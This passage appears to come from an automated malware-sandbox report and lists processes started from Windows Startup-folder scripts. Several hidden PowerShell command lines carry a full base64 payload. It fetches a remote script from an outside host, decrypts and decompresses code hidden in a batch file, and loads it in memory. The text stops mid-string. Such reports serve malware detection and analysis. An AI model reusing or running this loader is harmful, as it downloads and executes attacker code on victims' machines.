id2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNhQUJDZEFCQyhbYnl0ZVtdXSRwYXJhbV92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRvZWVvdj0keHVwenouQUJDRUFCQ25BQkN0QUJDckFCQ3lBQkNQQUJDb0FCQ2lBQkNuQUJDdEFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2Vlb3YuQUJDSUFCQ25BQkN2QUJDb0FCQ2tBQkNlQUJDKCRudWxsLCAkcGFyYW0yX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7fSRra2MgPSAkZW52OlVTRVJOQU1FOyR3bmp3ZiA9ICdDOlxVc2Vyc1wnICsgJGtrYyArICdBQkNcQUJDZEFCQ3dBQkNtQUJDLkFCQ2JBQkNhQUJDdEFCQycuUmVwbGFjZSgnQUJDJywgJycpOyRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHduandmOyR1bXFvaj1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHduandmKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkaGtsIGluICR1bXFvaikgewlpZiAoJGhrbC5TdGFydHNXaXRoKCc6OicpKQl7CQkkcGV6eXA9JGhrbC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kZ2NvdXI9W3N0cmluZ1tdXSRwZXp5cC5TcGxpdCgnXCcpO0lFWCAnJGJldHJwPW9mZXRhIChwdGprcyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRnY291clswXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtJRVggJyRzYnZzaz1vZmV0YSAocHRqa3MgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkZ2NvdXJbMV0pKSk7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7bGh5eHEgJGJldHJwICRudWxsO2xoeXhxICRzYnZzayAoLFtzdHJpbmdbXV0gKCclQUJDJykpOw==')) | IEX" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 2640 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b2a427d4.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 5888 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 1264 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b2a427d4.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 5368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5440 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNhQUJDZEFCQyhbYnl0ZVtdXSRwYXJhbV92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRvZWVvdj0keHVwenouQUJDRUFCQ25BQkN0QUJDckFCQ3lBQkNQQUJDb0FCQ2lBQkNuQUJDdEFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2Vlb3YuQUJDSUFCQ25BQkN2QUJDb0FCQ2tBQkNlQUJDKCRudWxsLCAkcGFyYW0yX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7fSRra2MgPSAkZW52OlVTRVJOQU1FOyR3bmp3ZiA9ICdDOlxVc2Vyc1wnICsgJGtrYyArICdBQkNcQUJDZEFCQ3dBQkNtQUJDLkFCQ2JBQkNhQUJDdEFCQycuUmVwbGFjZSgnQUJDJywgJycpOyRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHduandmOyR1bXFvaj1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHduandmKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkaGtsIGluICR1bXFvaikgewlpZiAoJGhrbC5TdGFydHNXaXRoKCc6OicpKQl7CQkkcGV6eXA9JGhrbC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kZ2NvdXI9W3N0cmluZ1tdXSRwZXp5cC5TcGxpdCgnXCcpO0lFWCAnJGJldHJwPW9mZXRhIChwdGprcyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRnY291clswXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtJRVggJyRzYnZzaz1vZmV0YSAocHRqa3MgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkZ2NvdXJbMV0pKSk7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7bGh5eHEgJGJldHJwICRudWxsO2xoeXhxICRzYnZzayAoLFtzdHJpbmdbXV0gKCclQUJDJykpOw==')) | IEX" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 5876 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b2674f34.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 4500 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 3840 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_b2674f34.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 6304 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN0QUJDckFCQ2VBQkNhQUJDbUFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckZ2l5b2g9TmV3LU9iamVjdCBTeXN0ZW0uSU8uQ0FCQ29tQUJDcHJBQkNlQUJDc3NBQkNpb0FCQ24uQUJDR1pBQkNpcEFCQ1N0QUJDcmVBQkNhbUFCQygkamhydW4sIFtJTy5DQUJDb21BQkNwckFCQ2VzQUJDc2lBQkNvbkFCQy5Db0FCQ21wQUJDcmVBQkNzc0FCQ2lBQkNvQUJDbkFCQ01vZGVdOjpEQUJDZUFCQ2NBQkNvbXBBQkNyZUFCQ3NzKTsnLlJlcGxhY2UoJ0FCQycsICcnKTsJJGdpeW9oLkNvcHlUbygkamJ1cmkpOwkkZ2l5b2guRGlzcG9zZSgpOwkkamhydW4uRGlzcG9zZSgpOwkkamJ1cmkuRGlzcG9zZSgpOwkkamJ1cmkuVG9BcnJheSgpO31mdW5jdGlvbiBsaHl4cSgkcGFyYW1fdmFyLCRwYXJhbTJfdmFyKXsJSUVYICckeHVweno9W1N5c3RlbS5SQUJDZUFCQ2ZsQUJDZWN0QUJDaW9BQkNuLkFCQ0FzQUJDc2VBQkNtYkFCQ2xBQkN5QUJDXTo6TEFCQ29BQkNhQUJDZEFCQyhbYnl0ZVtdXSRwYXJhbV92YXIpOycuUmVwbGFjZSgnQUJDJywgJycpOwlJRVggJyRvZWVvdj0keHVwenouQUJDRUFCQ25BQkN0QUJDckFCQ3lBQkNQQUJDb0FCQ2lBQkNuQUJDdEFCQzsnLlJlcGxhY2UoJ0FCQycsICcnKTsJSUVYICckb2Vlb3YuQUJDSUFCQ25BQkN2QUJDb0FCQ2tBQkNlQUJDKCRudWxsLCAkcGFyYW0yX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7fSRra2MgPSAkZW52OlVTRVJOQU1FOyR3bmp3ZiA9ICdDOlxVc2Vyc1wnICsgJGtrYyArICdBQkNcQUJDZEFCQ3dBQkNtQUJDLkFCQ2JBQkNhQUJDdEFCQycuUmVwbGFjZSgnQUJDJywgJycpOyRob3N0LlVJLlJhd1VJLldpbmRvd1RpdGxlID0gJHduandmOyR1bXFvaj1bU3lzdGVtLklPLkZpbGVdOjooJ3R4ZVRsbEFkYWVSJ1stMS4uLTExXSAtam9pbiAnJykoJHduandmKS5TcGxpdChbRW52aXJvbm1lbnRdOjpOZXdMaW5lKTtmb3JlYWNoICgkaGtsIGluICR1bXFvaikgewlpZiAoJGhrbC5TdGFydHNXaXRoKCc6OicpKQl7CQkkcGV6eXA9JGhrbC5TdWJzdHJpbmcoMik7CQlicmVhazsJfX0kZ2NvdXI9W3N0cmluZ1tdXSRwZXp5cC5TcGxpdCgnXCcpO0lFWCAnJGJldHJwPW9mZXRhIChwdGprcyAoW0FCQ0NBQkNvQUJDbkFCQ3ZBQkNlQUJDcnRdOjpBQkNGQUJDckFCQ29BQkNtQUJDQkFCQ2FBQkNzZTZBQkM0QUJDU0FCQ3RBQkNyaUFCQ25BQkNnQUJDKCRnY291clswXSkpKTsnLlJlcGxhY2UoJ0FCQycsICcnKTtJRVggJyRzYnZzaz1vZmV0YSAocHRqa3MgKFtBQkNDQUJDb0FCQ25BQkN2QUJDZUFCQ3JBQkN0XTo6QUJDRkFCQ3JBQkNvQUJDbUFCQ0JBQkNhQUJDc0FCQ2VBQkM2QUJDNEFCQ1NBQkN0ckFCQ2lBQkNuQUJDZygkZ2NvdXJbMV0pKSk7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7bGh5eHEgJGJldHJwICRudWxsO2xoeXhxICRzYnZzayAoLFtzdHJpbmdbXV0gKCclQUJDJykpOw==')) | IEX" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
  • cmd.exe (PID: 3128 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9de4acd0.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 2104 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • cmd.exe (PID: 6184 cmdline: C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_9de4acd0.cmd" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 4568 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 3628 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('dHJ5e2lleCAoKGlleCAoKCd3YndoaGJyam5rcWVucGVpd2J3aGhicmpua3FlbnBld3did2hoYnJqbmtxZW5wZXJ3YndoaGJyam5rcWVucGUgd2J3aGhicmpua3FlbnBlLXdid2hoYnJqbmtxZW5wZVV3YndoaGJyam5rcWVucGVzd2J3aGhicmpua3FlbnBlZXdid2hoYnJqbmtxZW5wZUJ3YndoaGJyam5rcWVucGVhd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVjd2J3aGhicmpua3FlbnBlUHdid2hoYnJqbmtxZW5wZWF3YndoaGJyam5rcWVucGVyd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZWl3YndoaGJyam5rcWVucGVud2J3aGhicmpua3FlbnBlZ3did2hoYnJqbmtxZW5wZSAid2J3aGhicmpua3FlbnBlaHdid2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGV0d2J3aGhicmpua3FlbnBlcHdid2hoYnJqbmtxZW5wZXN3YndoaGJyam5rcWVucGU6d2J3aGhicmpua3FlbnBlL3did2hoYnJqbmtxZW5wZS93YndoaGJyam5rcWVucGUwd2J3aGhicmpua3FlbnBleHdid2hoYnJqbmtxZW5wZTB3YndoaGJyam5rcWVucGUud2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZXR3YndoaGJyam5rcWVucGUvd2J3aGhicmpua3FlbnBlOHdid2hoYnJqbmtxZW5wZUt3YndoaGJyam5rcWVucGV1d2J3aGhicmpua3FlbnBlVndid2hoYnJqbmtxZW5wZS53YndoaGJyam5rcWVucGVwd2J3aGhicmpua3FlbnBlc3did2hoYnJqbmtxZW5wZTF3YndoaGJyam5rcWVucGUiJykuUmVwbGFjZSgnd2J3aGhicmpua3FlbnBlJywnJykpKS5Db250ZW50KSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZX1jYXRjaHt9O2Z1bmN0aW9uIHB0amtzKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnTGlYaUhYbmtLdEVDZ3NEaFdZZFc2Z3FZWm41cHhwakUzUXROLzNnQjIzYz0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ3Ird1FPUi9QYUdmZWNTVk8vOGlrdFE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gb2ZldGEoJHBhcmFtX3Zhcil7CUlFWCAnJGpocnVuPU5ldy1PYmplY3QgU3lzdGVtLklPLk1BQkNlbUFCQ29yQUJDeVNBQkN0ckFCQ2VhQUJDbSgsJHBhcmFtX3Zhcik7Jy5SZXBsYWNlKCdBQkMnLCAnJyk7CUlFWCAnJGpidXJpPU5ldy1PYmplY3QgU3lzdGVtLklPLkFCQ01BQkNlQUJDbUFCQ29BQkNyQUJDeUFCQ1NBQkN